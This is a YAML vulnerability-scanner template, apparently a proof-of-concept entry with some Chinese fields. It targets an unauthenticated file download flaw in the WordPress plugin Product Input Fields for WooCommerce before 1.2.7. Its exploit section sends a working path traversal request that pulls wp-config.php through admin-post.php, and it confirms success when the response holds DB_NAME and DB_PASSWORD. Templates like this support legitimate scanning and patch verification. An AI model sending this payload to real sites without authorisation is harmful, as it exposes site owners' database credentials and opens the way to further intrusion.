product: WordPress
vName: WordPress Product Input Fields for WooCommerce - Unauthenticated File Download
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload.
version: < 1.2.7
note: ''
search: { }
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
